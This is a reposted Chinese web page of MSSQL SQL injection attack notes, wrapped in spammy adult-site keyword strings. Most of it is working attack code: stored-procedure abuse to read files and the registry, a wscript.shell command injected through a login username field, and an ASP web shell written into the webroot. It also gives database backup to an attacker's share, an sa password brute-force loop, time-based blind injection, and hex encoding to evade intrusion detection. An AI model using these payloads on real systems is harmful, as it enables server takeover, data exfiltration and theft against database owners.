好吊视频一区二区三区四区 ,日韩综合一区,一区二区三区四区欧美日韩

主頁 > 知識庫 > Mssql高級注入筆記II

Mssql高級注入筆記II

一些sql擴展
xp_regaddmultistring
xp_regdeletekey 刪除鍵名
xp_regdeletevalue 刪除鍵值
xp_regenumkeys 枚舉
xp_regenumvalues
xp_regread 對于
xp_regremovemultistring
xp_regwrite 寫
xp_availablemedia 查看驅動器
xp_dirtree 看目錄
xp_enumdsn ODBC數據源
xp_loginconfig 一些服務器安全配置的信息
xp_makecab 打包，某些dbo權限先可做大用
xp_ntsec_enumdomains 枚舉域名相關信息
xp_terminate_process 終端進程和ip啦
xp_logininfo 當前登錄帳號
sp_configure 檢索數據庫中的內容（我覺得這個挺有用的）
sp_helpextendedproc 得到所有的存儲擴展
sp_who2 查詢用戶，他們登錄的主機，他們在數據庫中執行的操作等等

一些網絡信息
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters',
'nullsessionshares'
SNMP輔助網絡踩點
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcomm
unities'

開始一些系統服務,比如telnet，前提希望可以跑來admin或者一些系統密碼
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'

Sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll' 此擴展可以運行程序

使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。簡單地創建這個表：
create table foo( line varchar(8000) )
然后執行bulk insert操作把文件中的數據插入到表中，如：
bulk insert foo from 'c:\inetpub\wwwroot\admin\inc.asp'

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar
'S'參數為執行查詢的服務器，'U'參數為用戶名，'P'參數為密碼，這里為'foobar'

SQL SERVER中提供了幾個內置的允許創建ActiveX自動執行腳本的存儲過程。這些腳本和運行在windows腳本解釋器下的腳本，或者ASP腳本程序一樣——他們使用VBScript或JavaScript書寫，他們創建自動執行對象并和它們交互。一個自動執行腳本使用這種方法書寫可以在Transact-SQL中做任何在ASP腳本中，或者WSH腳本中可以做的任何事情
使用'wscript.shell'對象建立了一個記事本的實例：
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'notepad.exe'
指定在用戶名后面來執行它：
Username：'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'—

使用FSO讀一個已知的文本文件：
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

創建了一個能執行通過提交的命令，默認是asp那組權限的用戶下運行，前提是sp_oacreate擴展存在
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>'

sp_who '1' select * from sysobjects

針對局域網滲透,備份拖庫或者非sa用戶
declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat ,name=test;--
當前數據庫就備份到你的硬盤上了
select * from openrowset(sqloledb,myserver;sa;,select * from table) 回連，默認需要支持多語句查詢

添加登錄，使其成為固定服務器角色的成員。
語法
sp_addsrvrolemember [ @loginame = ] 'login'
[@rolename =] 'role'
參數
[@loginame =] 'login'
是添加到固定服務器角色的登錄名稱。login 的數據類型為 sysname，沒有默認值。login 可以是 Microsoft? SQL Server? 登錄或 Microsoft Windows NT? 用戶帳戶。如果還沒有對該 Windows NT 登錄授予 SQL Server 訪問權限，那么將自動對其授予訪問權限。
[@rolename =] 'role'
要將登錄添加到的固定服務器角色的名稱。role 的數據類型為 sysname，默認值為 NULL，它必須是下列值之一：
sysadmin
securityadmin
serveradmin
setupadmin
processadmin
diskadmin
dbcreator
bulkadmin
返回代碼值
0（成功）或 1（失敗）
注釋
在將登錄添加到固定服務器角色時，該登錄就會得到與此固定服務器角色相關的權限。
不能更改 sa 登錄的角色成員資格。
請使用 sp_addrolemember 將成員添加到固定數據庫角色或用戶定義的角色。
不能在用戶定義的事務內執行 sp_addsrvrolemember 存儲過程。
權限
sysadmin 固定服務器的成員可以將成員添加到任何固定服務器角色。固定服務器角色的成員可以執行 sp_addsrvrolemember 將成員只添加到同一個固定服務器角色。
示例
下面的示例將 Windows NT 用戶 Corporate\HelenS 添加到 sysadmin 固定服務器角色中。
EXEC sp_addsrvrolemember 'Corporate\HelenS', 'sysadmin'

OPENDATASOURCE
不使用鏈接的服務器名，而提供特殊的連接信息，并將其作為四部分對象名的一部分。
語法
OPENDATASOURCE ( provider_name, init_string )
參數
provider_name
注冊為用于訪問數據源的 OLE DB 提供程序的 PROGID 的名稱。provider_name 的數據類型為 char，沒有默認值。
init_string
連接字符串，這些字符串將要傳遞給目標提供程序的 IDataInitialize 接口。提供程序字符串語法是以關鍵字值對為基礎的，這些關鍵字值對由分號隔開，例如："keyword1=value; keyword2=value."
在 Microsoft? Data Access SDK 中定義了基本語法。有關所支持的特定關鍵字值對的信息，請參見提供程序中的文檔。下表列出 init_string 參數中最常用的關鍵字。
關鍵字 OLE DB 屬性有效值和描述
數據源 DBPROP_INIT_DATASOURCE 要連接的數據源的名稱。不同的提供程序用不同的方法對此進行解釋。對于 SQL Server OLE DB 提供程序來說，這會指明服務器的名稱。對于 Jet OLE DB 提供程序來說，這會指明 .mdb 文件或 .xls 文件的完整路徑。
位置 DBPROP_INIT_LOCATION 要連接的數據庫的位置。
擴展屬性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的連接字符串。
連接超時 DBPROP_INIT_TIMEOUT 超時值，在該超時值后，連接嘗試將失敗。
用戶 ID DBPROP_AUTH_USERID 用于該連接的用戶 ID。
密碼 DBPROP_AUTH_PASSWORD 用于該連接的密碼。
目錄 DBPROP_INIT_CATALOG 連接到數據源時的初始或默認的目錄名稱。

OPENDATASOURCE 函數可以在能夠使用鏈接服務器名的相同 Transact-SQL 語法位置中使用。因此，就可以將 OPENDATASOURCE 用作四部分名稱的第一部分，該名稱指的是 SELECT、INSERT、UPDATE 或 DELETE 語句中的表或視圖的名稱；或者指的是 EXECUTE 語句中的遠程存儲過程。當執行遠程存儲過程時，OPENDATASOURCE 應該指的是另一個 SQL Server。OPENDATASOURCE 不接受參數變量。
與 OPENROWSET 函數類似，OPENDATASOURCE 應該只引用那些不經常訪問的 OLE DB 數據源。對于訪問次數稍多的任何數據源，請為它們定義鏈接的服務器。無論 OPENDATASOURCE 還是 OPENROWSET 都不能提供鏈接的服務器定義的全部功能，例如，安全管理以及查詢目錄信息的能力。每次調用 OPENDATASOURCE 時，都必須提供所有的連接信息（包括密碼）。
示例
下面的示例訪問來自某個表的數據，該表在 SQL Server 的另一個實例中。
SELECT *
FROM OPENDATASOURCE(
'SQLOLEDB',
'Data Source=ServerName;User ID=MyUID;Password=MyPass'
).Northwind.dbo.Categories

下面是個查詢的示例，它通過用于 Jet 的 OLE DB 提供程序查詢 Excel 電子表格。
SELECT *
FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0',
'Data Source="c:\Finance\account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions

針對MSDASQL 用存儲過程建立的sql連接，在blackbox測試中，好象沒什么注入區別
declare @username nvarchar(4000), @query nvarchar(4000)
declare @pwd nvarchar(4000), @char_set nvarchar(4000)
declare @pwd_len int, @i int, @c char
select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'
select @pwd_len = 8
select @username = 'sa'
while @i  @pwd_len begin
-- make pwd
(code deleted)
-- try a login
select @query = N'select * from
OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username +
N';pwd=' + @pwd + N''',''select @@version'')'
exec xp_execresultset @query, N'master'
--check for success
(code deleted)
-- increment the password
(code deleted)
end

盲注技巧之一，時間延緩（可以加一個循環函數，運行查詢時間越久說說明當前字段正確）
if (select user) = 'sa' waitfor delay '0:0:5'

if exists (select * from pubs..pub_info) waitfor delay '0:0:5'

create table pubs..tmp_file (is_file int, is_dir int, has_parent int)
insert into pubs..tmp_file exec master..xp_fileexist 'c:\boot.ini'
if exists (select * from pubs..tmp_file) waitfor delay '0:0:5'
if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'

字符對比
if (ascii(substring(@s, @byte, 1))  ( power(2, @bit))) > 0 waitfor
delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1))  ( power(2, 0))) > 0 waitfor delay '0:0:5'
declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,
1, 1))  ( power(2, 1))) > 0 waitfor delay '0:0:5'

編碼的秘密，饒過IDS
declare @q varchar(8000)
select @q = 0x73656c65637420404076657273696f6e
exec(@q)

This runs 'select @@version', as does:

declare @q nvarchar(4000)
select @q =
0x730065006c00650063007400200040004000760065007200730069006f006e00
exec(@q)

In the stored procedure example above we saw how a 'sysname' parameter can contain
multiple SQL statements without the use of single quotes or semicolons:

sp_msdropretry [foo drop table logs select * from sysobjects], [bar]

嘻嘻，不知道這次被轉走以后會不會看到偶的名字呢？~要有的話，就把高級注入筆記I也發出來

標簽：懷化重慶公主嶺麗江成都天津內江臺灣

巨人網絡通訊聲明：本文標題《Mssql高級注入筆記II》，本文關鍵詞 Mssql,高級,注入,筆記,Mssql,；如發現本文內容存在版權問題，煩請提供相關信息告之我們，我們將及時溝通與處理。本站內容系統采集于網絡，涉及言論、版權與本站無關。

婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

Mssql高級注入筆記II